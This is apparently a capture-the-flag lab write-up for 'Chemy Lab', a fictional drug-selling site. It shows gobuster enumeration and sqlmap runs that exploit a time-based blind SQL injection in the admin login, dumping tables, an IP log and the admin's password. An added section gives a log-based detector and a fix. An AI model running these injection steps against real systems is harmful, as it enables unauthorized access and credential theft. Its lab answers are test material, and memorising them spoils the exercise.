Chemy Lab
Our Cyber Incident Response team has received information about illegal sales on a pharmaceutical sales site. The site administrator is reportedly selling banned drugs to different countries, and we believe that contracted companies and customers are hosted on the server. Your task is to infiltrate the server and collect information about the contracted companies and the people associated with them.
What is the contact email address?
==> The Answer : info@chemystore.hv
What is the site administrator’s ip address?
- I use gobuster to scan for files on the target:
__ __ __ _
/ / / /___ ______/ /___ __(_)_______ _____
/ /_/ / __ `/ ___/ //_/ | / / / ___/ _ \/ ___/
/ __ / /_/ / /__/ ,< | |/ / (__ ) __/ /
/_/ /_/\__,_/\___/_/|_| |___/_/____/\___/_/
┌─[root@hackerbox]─[~]
└──╼ #gobuster dir -u "http://chemystore.hv/" -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,txt,html,bak,old
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://chemystore.hv/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,bak,old
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.hta.php (Status: 403) [Size: 278]
/.hta.txt (Status: 403) [Size: 278]
/.hta.html (Status: 403) [Size: 278]
/.hta.bak (Status: 403) [Size: 278]
/.hta.old (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htaccess.bak (Status: 403) [Size: 278]
/.htaccess.old (Status: 403) [Size: 278]
/.htaccess.php (Status: 403) [Size: 278]
/.htaccess.txt (Status: 403) [Size: 278]
/.htaccess.html (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htpasswd.bak (Status: 403) [Size: 278]
/.htpasswd.old (Status: 403) [Size: 278]
/.htpasswd.php (Status: 403) [Size: 278]
/.htpasswd.txt (Status: 403) [Size: 278]
/.htpasswd.html (Status: 403) [Size: 278]
/adminpanel (Status: 301) [Size: 319] [--> http://chemystore.hv/adminpanel/]
/images (Status: 301) [Size: 315] [--> http://chemystore.hv/images/]
/index.php (Status: 200) [Size: 4942]
/index.php (Status: 200) [Size: 4942]
/server-status (Status: 403) [Size: 278]
/uploads (Status: 301) [Size: 316] [--> http://chemystore.hv/uploads/]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================
┌─[root@hackerbox]─[~]
└──╼ #
- I see that I may be able to inject into /adminpanel/logon.php
- I use sqlmap to enumerate the databases:
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" --dbs
___
__H__
___ ___["]_____ ___ ___ {1.9.9#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:50 /2025-12-10/
[11:06:50] [INFO] resuming back-end DBMS 'mysql'
[11:06:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=innbfj5itve...rvqv06l4k6'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:06:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: PHP, Apache 2.4.61
back-end DBMS: MySQL >= 5.0.12
[11:06:59] [INFO] fetching database names
[11:06:59] [INFO] fetching number of databases
[11:06:59] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:07:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[11:07:13] [INFO] retrieved:
[11:07:18] [INFO] adjusting time delay to 1 second due to good response times
mysql
[11:07:34] [INFO] retrieved: information_schema
[11:08:31] [INFO] retrieved: performance_schema
[11:09:27] [INFO] retrieved: sys
[11:09:37] [INFO] retrieved: chemy
available databases [5]:
[*] chemy
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[11:09:52] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:09:52 /2025-12-10/
┌─[root@hackerbox]─[~]
└──╼ #
- The result shows that injection is possible, and we can also see that the target has 5 databases. Our target will be the database named chemy; now let's find its tables:
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy --tables
___
__H__
___ ___["]_____ ___ ___ {1.9.9#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:10:57 /2025-12-10/
[11:10:57] [INFO] resuming back-end DBMS 'mysql'
[11:10:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=o0kgmhu5orc...3kb6u3amll'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:11:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:11:14] [INFO] fetching tables for database: 'chemy'
[11:11:14] [INFO] fetching number of tables for database 'chemy'
[11:11:14] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:11:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:11:32] [INFO] adjusting time delay to 1 second due to good response times
3
[11:11:32] [INFO] retrieved: login_ip_addresses
[11:12:34] [INFO] retrieved: medicines
[11:12:58] [INFO] retrieved: users
Database: chemy
[3 tables]
+--------------------+
| login_ip_addresses |
| medicines |
| users |
+--------------------+
[11:13:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:13:13 /2025-12-10/
┌─[root@hackerbox]─[~]
└──╼ #
- The result shows that the chemy database has 3 tables; I guess that the login_ip_address table is where the answer to this question will be:
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy -T login_ip_addresses --dump
___
__H__
___ ___[.]_____ ___ ___ {1.9.9#stable}
|_ -| . [,] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:20:00 /2025-12-10/
[11:20:00] [INFO] resuming back-end DBMS 'mysql'
[11:20:00] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v96geml1nsk...qclhnufcv4'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:20:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:20:01] [INFO] fetching columns for table 'login_ip_addresses' in database 'chemy'
[11:20:01] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:20:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:20:17] [INFO] adjusting time delay to 1 second due to good response times
3
[11:20:17] [INFO] retrieved: id
[11:20:23] [INFO] retrieved: ip_address
[11:20:57] [INFO] retrieved: username
[11:21:19] [INFO] fetching entries for table 'login_ip_addresses' in database 'chemy'
[11:21:19] [INFO] fetching number of entries for table 'login_ip_addresses' in database 'chemy'
[11:21:19] [INFO] retrieved: 28
[11:21:27] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[11:21:29] [INFO] retrieved: 138.125.217.117
[11:22:18] [INFO] retrieved: admin
[11:22:32] [INFO] retrieved: 2
[11:22:35] [INFO] retrieved: 138.125.217.117
[11:23:23] [INFO] retrieved: admin
[11:23:37] [INFO] retrieved: 3
[11:23:40] [INFO] retrieved: 138.125.217.117
[11:24:29] [INFO] retrieved: admin
[11:24:43] [INFO] retrieved: 4
[11:24:47] [INFO] retrieved: 138.125.217.117
[11:25:35] [INFO] retrieved: admin
[11:25:49] [INFO] retrieved: 5
[11:25:52] [INFO] retrieved: 138.125.217^C
[11:26:30] [WARNING] Ctrl+C detected in dumping phase
Database: chemy
Table: login_ip_addresses
[4 entries]
+----+----------+-----------------+
| id | username | ip_address |
+----+----------+-----------------+
| 1 | admin | 138.125.217.117 |
| 2 | admin | 138.125.217.117 |
| 3 | admin | 138.125.217.117 |
| 4 | admin | 138.125.217.117 |
+----+----------+-----------------+
[11:26:30] [INFO] table 'chemy.login_ip_addresses' dumped to CSV file '/root/.local/share/sqlmap/output/chemystore.hv/dump/chemy/login_ip_addresses.csv'
[11:26:30] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:26:30 /2025-12-10/
==> The Answer : 138.125.217.117
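From the defender's side, the time-based blind extraction logged above (one client sending a long run of POSTs to the login form, with some responses held back by the injected delay, which sqlmap settles at 1 second) leaves a recognizable pattern in web server timing logs. The following is an added example, not part of the original writeup: it assumes an Apache log format that records service time with %D, and the function names, thresholds and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed Apache format (an assumption, not the lab's config):
#   LogFormat "%h %t \"%r\" %>s %D"      where %D is the service time in microseconds
LINE = re.compile(r'(?P<ip>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                  r'\d{3} (?P<usec>\d+)$')

def find_timing_probes(lines, path="/adminpanel/login.php", delay=1.0,
                       min_requests=20, min_slow_ratio=0.2):
    """Return {client_ip: (posts, delayed_posts)} for clients whose POSTs to `path`
    look like time-based blind extraction: a burst of requests in which a
    large share of responses is held back by at least `delay` seconds."""
    stats = defaultdict(lambda: [0, 0])
    for line in lines:
        m = LINE.match(line.strip())
        if not m or m["method"] != "POST" or m["path"] != path:
            continue
        counters = stats[m["ip"]]
        counters[0] += 1
        if int(m["usec"]) / 1_000_000 >= delay:
            counters[1] += 1
    return {ip: (n, slow) for ip, (n, slow) in stats.items()
            if n >= min_requests and slow / n >= min_slow_ratio}

def sample_log():
    """Constructed log lines (documentation IP ranges), not taken from the lab."""
    fmt = '{ip} [10/Dec/2025:11:21:{s:02d} +0000] "POST /adminpanel/login.php HTTP/1.1" 200 {us}'
    lines = []
    for s in range(40):   # one client: every third response stalls for about 1 s
        lines.append(fmt.format(ip="203.0.113.10", s=s, us=1_030_000 if s % 3 == 0 else 28_000))
    for s in range(25):   # busy but benign client: many logins, none delayed
        lines.append(fmt.format(ip="198.51.100.20", s=s, us=31_000))
    for s, us in enumerate([35_000, 2_400_000, 33_000]):   # one slow page, too few requests
        lines.append(fmt.format(ip="198.51.100.7", s=s, us=us))
    return lines

if __name__ == "__main__":
    for ip, (n, slow) in find_timing_probes(sample_log()).items():
        print(f"{ip}: {slow}/{n} POSTs to the login form delayed >= 1 s")
```

Timing only flags the symptom; the injection itself goes away when the login query binds `username` as a parameter instead of concatenating it into the SQL string.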
What is the name of the company contracted in Italy in connection with the illegal sale of medicines?
- I dump the users table and get the administrator's account and password:
┌─[root@hackerbox]─[~]
└──╼ #sqlmap -u "http://chemystore.hv/adminpanel/login.php" --data="username=admin&password=admin" -D chemy -T users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.9.9#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:29:13 /2025-12-10/
[11:29:13] [INFO] resuming back-end DBMS 'mysql'
[11:29:13] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7lsh83vb39q...l3rup844db'). Do you want to use those [Y/n]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 5400 FROM (SELECT(SLEEP(5)))yScI) AND 'pFlF'='pFlF&password=admin
---
[11:29:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.61, PHP
back-end DBMS: MySQL >= 5.0.12
[11:29:16] [INFO] fetching columns for table 'users' in database 'chemy'
[11:29:16] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[11:29:17] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:29:32] [INFO] adjusting time delay to 1 second due to good response times
3
[11:29:32] [INFO] retrieved: id
[11:29:38] [INFO] retrieved: password
[11:30:06] [INFO] retrieved: username
[11:30:28] [INFO] fetching entries for table 'users' in database 'chemy'
[11:30:28] [INFO] fetching number of entries for table 'users' in database 'chemy'
[11:30:28] [INFO] retrieved: 1
[11:30:29] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
1
[11:30:31] [INFO] retrieved: T9829A6P5r
[11:31:09] [INFO] retrieved: admin
Database: chemy
Table: users
[1 entry]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | T9829A6P5r | admin |
+----+------------+----------+
[11:31:23] [INFO] table 'chemy.users' dumped to CSV file '/root/.local/share/sqlmap/output/chemystore.hv/dump/chemy/users.csv'
[11:31:23] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/chemystore.hv'
[*] ending @ 11:31:23 /2025-12-10/